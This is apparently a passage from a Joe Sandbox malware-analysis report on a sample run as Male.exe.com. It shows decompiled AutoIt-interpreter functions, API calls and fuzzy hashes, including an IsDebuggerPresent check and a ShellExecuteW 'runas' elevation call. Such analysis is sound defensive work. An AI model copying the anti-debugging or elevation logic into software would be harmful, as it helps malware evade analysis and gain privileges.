Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@
String ID: PreExtract$Shortcut
API String ID: 1936579350-2482910946
Opcode ID: fadad1ec2e81b89812f4e292f7c130b7338f4d0e1c19578ce685f96c8dd63308
Instruction ID: 315cf4f10766d584262b92d033bb85e5ff693b0b03308dd198ea8ef753a083d6
Opcode Fuzzy Hash: fadad1ec2e81b89812f4e292f7c130b7338f4d0e1c19578ce685f96c8dd63308
Instruction Fuzzy Hash: 6B21A634A005099ADF24EB55C5856FFB374DF51324F24423BE861BA2C1EA7CAE81CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004056CB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

_wtol.MSVCRT(00000000,00000030,GUIFlags,00405939,?,0041E138,?,?,004066DE,?), ref: 00405668

Strings

MiscFlags, xrefs: 0040564A
tA, xrefs: 004056DF

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: _wtol
String ID: MiscFlags$tA
API String ID: 2131799477-2718850419
Opcode ID: 2afad0e8fec61067b3716dfa9b106afa26c29772baddf64e22fdb0a12229e978
Instruction ID: c8600267b0de4b6b736e5ffddf797ee874a7f0c572f21ec5a04ec4b3cd89c438
Opcode Fuzzy Hash: 2afad0e8fec61067b3716dfa9b106afa26c29772baddf64e22fdb0a12229e978
Instruction Fuzzy Hash: 30F0306180082042DB38161554C857BA696DA1B761FB94E3BE85EF12E0D33F8CC19D6F

Uniqueness

Uniqueness Score: -1.00%

Function 00405B77, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B77() {

				MessageBoxA(0, "Could not allocate memory", "7-Zip SFX", 0x10);
				return 0;
			}

0x00405b85
0x00405b8d

APIs

MessageBoxA.USER32 ref: 00405B85

Strings

Could not allocate memory, xrefs: 00405B7E
7-Zip SFX, xrefs: 00405B79

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: c7186cdcb0c566b5a5a438bceff3b0e8cdd749d374d7577f2b3fc30ec3787668
Instruction ID: 2fd3f133cd00b8be6539cc3c82b36fa91af98800b418d3be2fc451a6c5964550
Opcode Fuzzy Hash: c7186cdcb0c566b5a5a438bceff3b0e8cdd749d374d7577f2b3fc30ec3787668
Instruction Fuzzy Hash: BEB012303C930821D10003200C0BFD41160D70CF16F5044517100A8CC9C7C87090914D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Male.exe.com PID: 6800 Parent PID: 6752 Male.exe.comCOMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	1356
Total number of Limit Nodes:	50

Executed Functions

Function 013B29A4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E013B29A4(void* __eflags) {
				char _v8;
				signed int _v12;
				struct _SYSTEM_INFO _v48;
				intOrPtr _v50;
				unsigned int _v52;
				struct _OSVERSIONINFOW _v332;
				signed int _t37;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t42;
				_Unknown_base(*)()* _t56;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed char _t66;
				signed int _t67;
				signed int _t70;
				char _t73;
				signed int _t74;
				intOrPtr _t78;
				signed int _t80;
				struct HINSTANCE__* _t82;
				void* _t86;
				intOrPtr _t91;

				E013B9091(0x148239c, __eflags);
				 *0x14823c8 = 0;
				_v332.dwOSVersionInfoSize = 0x11c;
				GetVersionExW( &_v332);
				 *0x1482390 = _v332.dwMajorVersion;
				 *0x1482394 = _v332.dwMinorVersion;
				 *0x1482398 = _v332.dwBuildNumber;
				E013BB0DB(0x148239c,  &(_v332.szCSDVersion));
				_t37 = 0;
				_t63 = 0xffffffffffffffff;
				_t86 =  *0x14823a0 - _t37; // 0x0
				if(_t86 > 0) {
					do {
						_t78 =  *0x148239c; // 0x19ab858
						_t74 = 0;
						_t70 = 0;
						__eflags = 0;
						_v12 =  *(_t78 + _t37 * 2) & 0x0000ffff;
						_t80 = 0x20;
						do {
							__eflags = _v12 - _t80;
							if(_v12 == _t80) {
								_t70 = _t70 + 1;
								__eflags = _t70;
							}
							_t80 =  *(0x144d95a + _t74 * 2) & 0x0000ffff;
							_t74 = _t74 + 1;
							__eflags = _t80;
						} while (_t80 != 0);
						__eflags = _t70;
						if(_t70 == 0) {
							L2:
							if(_t37 != _t63) {
								_t63 = _t37;
							}
							E013B99C5(_t37, 0x148239c, 0, _t63);
							E013B3249(0x148239c, " ");
							_t40 =  *0x1482390; // 0xa
							 *0x14823c3 = 0;
							 *0x14823ac = 0;
							 *0x14823b0 = 0;
							 *0x14823b4 = 0;
							 *0x14823b8 = 0;
							 *0x14823bc = 0;
							 *0x14823c0 = 0;
							 *0x14823c2 = 0;
							_t66 = 1;
							_t41 = _t40 - 5;
							if(_t41 == 0) {
								_t42 =  *0x1482394; // 0x0
								__eflags = _t42 - _t66;
								if(_t42 != _t66) {
									__eflags = _t42 - 2;
									if(_t42 != 2) {
										L48:
										 *0x14823c8 = _v52 >> 0x00000006 & _t66;
										goto L9;
									}
									 *0x14823ad = _t66;
									 *0x14823af = _t66;
									__eflags = _v50 - _t66;
									if(_v50 == _t66) {
										L47:
										 *0x14823ac = _t66;
										goto L48;
									}
									 *0x14823ae = _t66;
									goto L48;
								}
								 *0x14823ad = _t66;
								goto L47;
							} else {
								_t58 = _t41 - _t66;
								if(_t58 == 0) {
									_t59 =  *0x1482394; // 0x0
									 *0x14823ad = _t66;
									 *0x14823af = _t66;
									__eflags = _t59;
									if(_t59 != 0) {
										__eflags = _t59 - _t66;
										if(_t59 != _t66) {
											__eflags = _t59 - 2;
											if(_t59 != 2) {
												__eflags = _t59 - 3;
												if(_t59 == 3) {
													 *0x14823bb = _t66;
													 *0x14823b9 = _t66;
													 *0x14823b7 = _t66;
													 *0x14823b5 = _t66;
													 *0x14823b1 = _t66;
													 *0x14823bd = _t66;
													__eflags = _v50 - _t66;
													if(_v50 != _t66) {
														 *0x14823bf = _t66;
														 *0x14823be = _t66;
													} else {
														 *0x14823bc = _t66;
													}
												}
											} else {
												 *0x14823b7 = _t66;
												 *0x14823b5 = _t66;
												 *0x14823b1 = _t66;
												 *0x14823b9 = _t66;
												__eflags = _v50 - _t66;
												if(_v50 != _t66) {
													 *0x14823bb = _t66;
													 *0x14823ba = _t66;
												} else {
													 *0x14823b8 = _t66;
												}
											}
										} else {
											 *0x14823b1 = _t66;
											 *0x14823b3 = _t66;
											 *0x14823b5 = _t66;
											__eflags = _v50 - _t66;
											if(_v50 != _t66) {
												 *0x14823b7 = _t66;
												 *0x14823b6 = _t66;
											} else {
												 *0x14823b4 = _t66;
											}
										}
									} else {
										 *0x14823b1 = _t66;
										__eflags = _v50 - _t66;
										if(_v50 != _t66) {
											 *0x14823b3 = _t66;
											 *0x14823b2 = _t66;
										} else {
											 *0x14823b0 = _t66;
										}
									}
								} else {
									if(_t58 == 4) {
										 *0x14823ad = _t66;
										 *0x14823af = _t66;
										 *0x14823bb = _t66;
										 *0x14823b9 = _t66;
										 *0x14823b7 = _t66;
										 *0x14823b5 = _t66;
										 *0x14823b1 = _t66;
										 *0x14823bd = _t66;
										 *0x14823bf = _t66;
										_t91 =  *0x1482394; // 0x0
										if(_t91 == 0) {
											 *0x14823c1 = _t66;
											if(_v50 != _t66) {
												 *0x14823c3 = _t66;
												 *0x14823c2 = _t66;
											} else {
												 *0x14823c0 = _t66;
											}
										}
									}
								}
								L9:
								_v8 = 0;
								__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
								_t73 = 1;
								if(_v8 != 1) {
									_t73 =  *0x14823c4; // 0x1
								} else {
									 *0x14823c4 = 1;
								}
								_t67 = 9;
								memset( &_v48, 0, _t67 << 2);
								if(_t73 == 0) {
									GetSystemInfo( &_v48);
									L17:
									 *0x14823c6 = _v48.dwOemId;
									return 0x1482390;
								}
								_t82 = LoadLibraryA("kernel32.dll");
								if(_t82 == 0) {
									L19:
									GetSystemInfo( &_v48);
									L15:
									if(_t82 != 0) {
										FreeLibrary(_t82);
									}
									goto L17;
								}
								_t56 = GetProcAddress(_t82, "GetNativeSystemInfo");
								if(_t56 == 0) {
									goto L19;
								} else {
									 *_t56( &_v48); // executed
									goto L15;
								}
							}
						}
						_t37 = _t37 + 1;
						__eflags = _t37 -  *0x14823a0; // 0x0
					} while (__eflags < 0);
				}
				_t37 = _t63;
				goto L2;
			}

0x013b29b6
0x013b29c1
0x013b29c9
0x013b29d3
0x013b29e1
0x013b29ec
0x013b29f7
0x013b2a03
0x013b2a08
0x013b2a0a
0x013b2a0d
0x013b2a13
0x013f3713
0x013f3713
0x013f3719
0x013f371d
0x013f371d
0x013f3723
0x013f3726
0x013f3727
0x013f3727
0x013f372b
0x013f372d
0x013f372d
0x013f372d
0x013f372e
0x013f3736
0x013f3737
0x013f3737
0x013f373c
0x013f373e
0x013b2a1b
0x013b2a1d
0x013f3752
0x013f3752
0x013b2a2d
0x013b2a39
0x013b2a3e
0x013b2a45
0x013b2a4c
0x013b2a52
0x013b2a58
0x013b2a5e
0x013b2a64
0x013b2a6a
0x013b2a71
0x013b2a79
0x013b2a7a
0x013b2a7d
0x013f3869
0x013f386e
0x013f3870
0x013f3890
0x013f3893
0x013f387e
0x013f3886
0x00000000
0x013f3886
0x013f3895
0x013f389b
0x013f38a1
0x013f38a4
0x013f3878
0x013f3878
0x00000000
0x013f3878
0x013f38a6
0x00000000
0x013f38a6
0x013f3872
0x00000000
0x013b2a83
0x013b2a83
0x013b2a85
0x013f376a
0x013f376f
0x013f3775
0x013f377b
0x013f377d
0x013f37a6
0x013f37a8
0x013f37dd
0x013f37e0
0x013f381b
0x013f381e
0x013f3824
0x013f382a
0x013f3830
0x013f3836
0x013f383c
0x013f3842
0x013f3848
0x013f384b
0x013f3858
0x013f385e
0x013f384d
0x013f384d
0x013f384d
0x013f384b
0x013f37e2
0x013f37e2
0x013f37e8
0x013f37ee
0x013f37f4
0x013f37fa
0x013f37fd
0x013f380a
0x013f3810
0x013f37ff
0x013f37ff
0x013f37ff
0x013f37fd
0x013f37aa
0x013f37aa
0x013f37b0
0x013f37b6
0x013f37bc
0x013f37bf
0x013f37cc
0x013f37d2
0x013f37c1
0x013f37c1
0x013f37c1
0x013f37bf
0x013f377f
0x013f377f
0x013f3785
0x013f3788
0x013f3795
0x013f379b
0x013f378a
0x013f378a
0x013f378a
0x013f3788
0x013b2a8b
0x013b2a8e
0x013b2a90
0x013b2a96
0x013b2a9c
0x013b2aa2
0x013b2aa8
0x013b2aae
0x013b2ab4
0x013b2aba
0x013b2ac0
0x013b2ac6
0x013b2acc
0x013b2ace
0x013b2ad7
0x013f3759
0x013f375f
0x013b2add
0x013b2add
0x013b2add
0x013b2ad7
0x013b2acc
0x013b2a8e
0x013b2ae3
0x013b2ae6
0x013b2af1
0x013b2af9
0x013b2afd
0x013b2b5c
0x013b2aff
0x013b2aff
0x013b2aff
0x013b2b0c
0x013b2b0d
0x013b2b11
0x013f38b2
0x013b2b49
0x013b2b4e
0x013b2b5b
0x013b2b5b
0x013b2b22
0x013b2b26
0x013b2b64
0x013b2b68
0x013b2b3e
0x013b2b40
0x013b2b43
0x013b2b43
0x00000000
0x013b2b40
0x013b2b2e
0x013b2b36
0x00000000
0x013b2b38
0x013b2b3c
0x00000000
0x013b2b3c
0x013b2b36
0x013b2a7d
0x013f3744
0x013f3745
0x013f3745
0x013f3713
0x013b2a19
0x00000000

APIs

GetVersionExW.KERNEL32(?), ref: 013B29D3

Part of subcall function 013BB0DB: _wcslen.LIBCMT ref: 013BB0EE

GetCurrentProcess.KERNEL32(?,0144D958,00000000,?,?), ref: 013B2AEA
IsWow64Process.KERNEL32(00000000,?,?), ref: 013B2AF1
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 013B2B1C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 013B2B2E
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 013B2B3C
FreeLibrary.KERNEL32(00000000,?,?), ref: 013B2B43
GetSystemInfo.KERNEL32(?,?,?), ref: 013B2B68

Strings

kernel32.dll, xrefs: 013B2B17
GetNativeSystemInfo, xrefs: 013B2B28

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3290436268-192647395
Opcode ID: eea93b3fd845872473deb4269dd9ab840d63019cd0c78671a51e7238909e4e9a
Instruction ID: 3216f4b78d5746fcb4feb42195af3674bbfe7260165e58d84fea821a5384a88f
Opcode Fuzzy Hash: eea93b3fd845872473deb4269dd9ab840d63019cd0c78671a51e7238909e4e9a
Instruction Fuzzy Hash: 2591D536D0E3D4DFD733DB7C74A0DEE7FA4AB26208B04489DD6819362ED6A05149CB22

Uniqueness

Uniqueness Score: -1.00%

Function 013B331E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E013B331E(void* __edx, void* __eflags, void* __fp0, char _a1, char _a2, char _a3, WCHAR* _a4, short* _a8, short* _a24, short _a40, short _a65576) {
				char _v0;
				intOrPtr _v3;
				void* __ebx;
				char _t38;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				char _t64;
				char _t65;
				struct HWND__* _t71;
				void* _t101;

				_t107 = __fp0;
				_t99 = __eflags;
				E013F2370();
				E013B9091( &_a24, __eflags);
				_t71 = 0;
				_a1 = 0;
				_a2 = 0;
				GetCurrentDirectoryW(0x7fff,  &_a40);
				E013B496B(_t99, _a4,  &_a3);
				if(IsDebuggerPresent() != 0) {
					MessageBoxA(0, "It is a violation of the AutoIt EULA to attempt to reverse engineer this program.", "AutoIt", 0x10);
					L12:
					return E013B774C( &_a24);
				}
				_t101 =  *0x14823f0 - 1; // 0x2
				if(_t101 == 0) {
					_t75 = 0x14833b0;
					E013B7998(0x14833b0, 1,  *0x14823f8, 0xffffffff);
					_t38 =  *0x1482354; // 0x0
					 *0x14833b2 = _t38;
					L4:
					_t39 = E013B45A6(_t75, _t107, 0x1482408,  *0x14823f0); // executed
					if(_t39 != 0) {
						E013B5AA7(_t71, 0x14833b0);
						SetCurrentDirectoryW( &_a40);
						 *0x148234c = 1;
						goto L12;
					}
					if(_a2 == 1) {
						_t43 = E01411EDD();
						__eflags = _t43;
						if(_t43 != 0) {
							goto L6;
						}
						__eflags = _a3 - _t43;
						if(__eflags != 0) {
							goto L6;
						}
						E013B4FF8( &_a24);
						E013BC110( &_a8, __eflags, 0x14731f4);
						__eflags = _t71;
						if(_t71 == 0) {
							E013B4DCB( &_a4, _t107, _a4);
							_push(1);
						} else {
							E013B4DCB( &_a4, _t107, "\"");
							E013B4D30( &_a4, _t107, 0x1482408);
							E013B4DCB( &_v0, _t107, "\"");
							_push(1);
						}
						ShellExecuteW(GetForegroundWindow(), L"runas", _a24, _a8,  &_a40, ??);
						E013B774C( &_a8);
						L10:
						E013B5AA7(_t71, 0x14833b0);
						L11:
						SetCurrentDirectoryW( &_a40);
						goto L12;
					}
					L6:
					E013B3466(); // executed
					E013B3546();
					_t71 = 0x14829b0;
					if( *0x14823f4 == 0) {
						E013B3DF8(0x14829b0, _t107);
					}
					L013BDCC0(_t71, 0x1482420, _t107, 1); // executed
					if( *0x14823f4 == 0) {
						E013B3B82(_t71);
					}
					goto L10;
				}
				_t63 = E013B2950(0x14833b0, __fp0, 0x1482408, 0x14823f0,  &_a24,  &_a1); // executed
				if(_t63 == 0) {
					 *0x148234c = 1;
					goto L11;
				}
				_t64 =  *0x14833b0; // 0x0
				 *0x14823f4 = _t64;
				_t65 =  *0x14833b1; // 0x0
				_a2 = _t65;
				GetFullPathNameW( *0x1482408, 0x7fff,  &_a65576,  &_a4);
				_t75 = 0x14823e0;
				E013BB0DB(0x14823e0, _a4);
				_t71 = _v3;
				goto L4;
			}

0x013b331e
0x013b331e
0x013b3329
0x013b3335
0x013b333e
0x013b3346
0x013b334a
0x013b334e
0x013b335c
0x013b3369
0x013f3e23
0x013b3454
0x013b3463
0x013b3463
0x013b3377
0x013b337d
0x013f3e36
0x013f3e39
0x013f3e3e
0x013f3e43
0x013b33e5
0x013b33f0
0x013b33f7
0x013f3e5a
0x013f3e64
0x013f3e6a
0x00000000
0x013f3e6a
0x013b3402
0x013f3e75
0x013f3e7a
0x013f3e7c
0x00000000
0x00000000
0x013f3e82
0x013f3e86
0x00000000
0x00000000
0x013f3e90
0x013f3e9e
0x013f3ea7
0x013f3ea9
0x013f3ed5
0x013f3eda
0x013f3eab
0x013f3eb1
0x013f3ebf
0x013f3ec9
0x013f3ece
0x013f3ece
0x013f3ef4
0x013f3efe
0x013b3442
0x013b3444
0x013b3449
0x013b344e
0x00000000
0x013b344e
0x013b3408
0x013b3408
0x013b340d
0x013b3419
0x013b341e
0x013b3422
0x013b3422
0x013b342d
0x013b3439
0x013b343d
0x013b343d
0x00000000
0x013b3439
0x013b3395
0x013b339c
0x013f3e4d
0x00000000
0x013f3e4d
0x013b33a2
0x013b33a7
0x013b33ac
0x013b33b1
0x013b33cd
0x013b33d7
0x013b33dc
0x013b33e1
0x00000000

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,013B292D,?), ref: 013B334E
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,013B292D,?), ref: 013B3361
GetFullPathNameW.KERNEL32(00007FFF,?,?,01482408,014823F0,?,?,?,?,?,?,013B292D,?), ref: 013B33CD

Part of subcall function 013BB0DB: _wcslen.LIBCMT ref: 013BB0EE

Part of subcall function 013B45A6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,013B33F5,01482408,?,?,?,?,?,?,?,013B292D,?), ref: 013B45E7

SetCurrentDirectoryW.KERNEL32(?,00000001,01482408,?,?,?,?,?,?,?,013B292D,?), ref: 013B344E
MessageBoxA.USER32 ref: 013F3E23
SetCurrentDirectoryW.KERNEL32(?,01482408,?,?,?,?,?,?,?,013B292D,?), ref: 013F3E64
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,014731F4,01482408,?,?,?,?,?,?,?,013B292D), ref: 013F3EED
ShellExecuteW.SHELL32(00000000,?,?), ref: 013F3EF4

Part of subcall function 013B3466: GetSysColorBrush.USER32(0000000F), ref: 013B3471
Part of subcall function 013B3466: LoadCursorW.USER32(00000000,00007F00), ref: 013B3480
Part of subcall function 013B3466: LoadIconW.USER32 ref: 013B3496
Part of subcall function 013B3466: LoadIconW.USER32 ref: 013B34A8
Part of subcall function 013B3466: LoadIconW.USER32 ref: 013B34BA
Part of subcall function 013B3466: LoadImageW.USER32 ref: 013B34D2
Part of subcall function 013B3466: RegisterClassExW.USER32 ref: 013B3523

Part of subcall function 013B3546: CreateWindowExW.USER32 ref: 013B3574
Part of subcall function 013B3546: CreateWindowExW.USER32 ref: 013B3595
Part of subcall function 013B3546: ShowWindow.USER32(00000000,?,?,?,?,?,?,013B292D,?), ref: 013B35A9
Part of subcall function 013B3546: ShowWindow.USER32(00000000,?,?,?,?,?,?,013B292D,?), ref: 013B35B2

Part of subcall function 013B3DF8: Shell_NotifyIconW.SHELL32(00000000,?), ref: 013B3EC9

Strings

AutoIt, xrefs: 013F3E18
runas, xrefs: 013F3EE8
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 013F3E1D

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 46b61932b2ddde9db475feba41c74811a33d738a2b121c24ec757629c03f21ca
Instruction ID: e1209fda5c06d6437e5d72147a0272f56423b75bff968cb7e98d8030d2654c76
Opcode Fuzzy Hash: 46b61932b2ddde9db475feba41c74811a33d738a2b121c24ec757629c03f21ca
Instruction Fuzzy Hash: 4151FB71608342AAD716FF789C90DEE7BA8FFA0608F00052DF78152576EF748549C722

Uniqueness

Uniqueness Score: -1.00%

Function 0141E334, Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,013F6043), ref: 0141E344
FindFirstFileW.KERNELBASE(?,?), ref: 0141E355
FindClose.KERNEL32(00000000), ref: 0141E365

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d2c8d4469d5cfdee4a3d722a417b6b9b22ce9d8a2f694e5d9c85aaf9b5d80ba9
Instruction ID: 4fe13f6bbb80c88195cb2f30c29c67d6ed6b4f9cb6393a38ee23e2961e92c908
Opcode Fuzzy Hash: d2c8d4469d5cfdee4a3d722a417b6b9b22ce9d8a2f694e5d9c85aaf9b5d80ba9
Instruction Fuzzy Hash: 8DE0DF39C14904AB82226B78EC0D8EA775CBB09235F400706FA35D21F8EB709A808696

Uniqueness

Uniqueness Score: -1.00%

Function 013D5108, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,013D50DE,00000003,01479820,0000000C,013D5235,00000003,00000002,00000000,?,013E2D05,00000003), ref: 013D5129
TerminateProcess.KERNEL32(00000000,?,013D50DE,00000003,01479820,0000000C,013D5235,00000003,00000002,00000000,?,013E2D05,00000003), ref: 013D5130
ExitProcess.KERNEL32 ref: 013D5142

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cfb8305dd4e588afb221ca5875d787579455bcceead890c9074e5c93c80bb41d
Instruction ID: 3371dce84db249eef328633e7901c67ccc4a170d0acdf0345374ecceb17dc7e9
Opcode Fuzzy Hash: cfb8305dd4e588afb221ca5875d787579455bcceead890c9074e5c93c80bb41d
Instruction Fuzzy Hash: 4AE0EC36800248AFEF316FA8ED18A583FB9EF6068AF004014F9158B135DB35DD52CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013B7CDD, Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E013B7CDD(char* __ecx, signed int __edx, void* __eflags, void* __fp0, int _a4, short** _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v32;
				char _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t61;
				intOrPtr* _t62;
				int _t63;
				intOrPtr* _t64;
				int _t68;
				int _t69;
				int _t70;
				signed short* _t75;
				int _t79;
				int _t84;
				int _t88;
				intOrPtr _t89;
				int _t92;
				int _t101;
				int _t104;
				int _t110;
				int _t111;
				int _t112;
				int _t114;
				int _t115;
				int _t116;
				int _t118;
				intOrPtr _t124;
				signed int _t127;
				signed int _t133;
				signed int _t143;
				char* _t145;
				void* _t146;
				short* _t147;
				signed int _t148;
				void* _t149;

				_t154 = __fp0;
				_t143 = __edx;
				_push(0x2000);
				_t145 = __ecx; // executed
				_t61 = E013D022B(__ecx, _t146, __eflags); // executed
				_v12 = _t61;
				_t62 = E013D01FB(_t146, __eflags);
				_t147 = _a4;
				_t118 = 1;
				_v16 = _t62;
				_t124 = 4;
				 *_t62 = 1;
				if( *_t147 == 0x23) {
					_t63 = E013D922B(1, _t124, _t147, _t147, L"#pragma compile", 0xf);
					_t149 = _t149 + 0xc;
					__eflags = _t63;
					if(_t63 != 0) {
						_t68 = E013D922B(1, _t124, _t147, _t147, L"#notrayicon", 0xb);
						_t149 = _t149 + 0xc;
						__eflags = _t68;
						if(_t68 == 0) {
							 *_t145 = 1;
						} else {
							_t69 = E013D922B(1, _t124, _t147, _t147, L"#requireadmin", 0xd);
							_t149 = _t149 + 0xc;
							__eflags = _t69;
							if(_t69 == 0) {
								 *((char*)(_t145 + 1)) = 1;
							} else {
								_t70 = E013D922B(1, _t124, _t147, _t147, L"#OnAutoItStartRegister", 0x16);
								_t149 = _t149 + 0xc;
								__eflags = _t70;
								if(__eflags == 0) {
									_a4 = E013B7A0C(_t147 + 0x2c, __eflags);
									E013B7BB5(_t71);
									E013B7CA2(__eflags, _a4);
									_t143 = E013D4D83(_a4);
									_a16 = 0x22;
									_t75 = _a4;
									_t127 =  *(_t75 + _t143 * 2 - 2) & 0x0000ffff;
									__eflags = _t127 - _a16;
									if(_t127 == _a16) {
										L31:
										__eflags =  *_t75 - _t127;
										if( *_t75 != _t127) {
											goto L30;
										} else {
											 *(_t75 + _t143 * 2 - 2) = 0;
											_t79 =  &(_t75[1]);
											__eflags = _t79;
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)))) + 8))(_t79);
											goto L33;
										}
									} else {
										_v8 = 0x27;
										__eflags = _t127 - _v8;
										if(_t127 == _v8) {
											goto L31;
										} else {
											_t133 =  *_t75 & 0x0000ffff;
											__eflags = _t133 - _a16;
											if(_t133 == _a16) {
												L30:
												E013D0234(_t75);
												_push(_t147);
												_push(L"Bad directive syntax error");
												goto L47;
											} else {
												__eflags = _t133 - _v8;
												if(_t133 == _v8) {
													goto L30;
												} else {
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)))) + 8))(_a4);
													L33:
													E013D0234(_a4);
												}
											}
										}
									}
								} else {
									_t84 = E013D922B(1, _t124, _t147, _t147, L"#include-once", 0xd);
									_t149 = _t149 + 0xc;
									__eflags = _t84;
									if(_t84 == 0) {
										_t148 = 0;
										__eflags =  *(_t145 + 0x20);
										if( *(_t145 + 0x20) > 0) {
											while(1) {
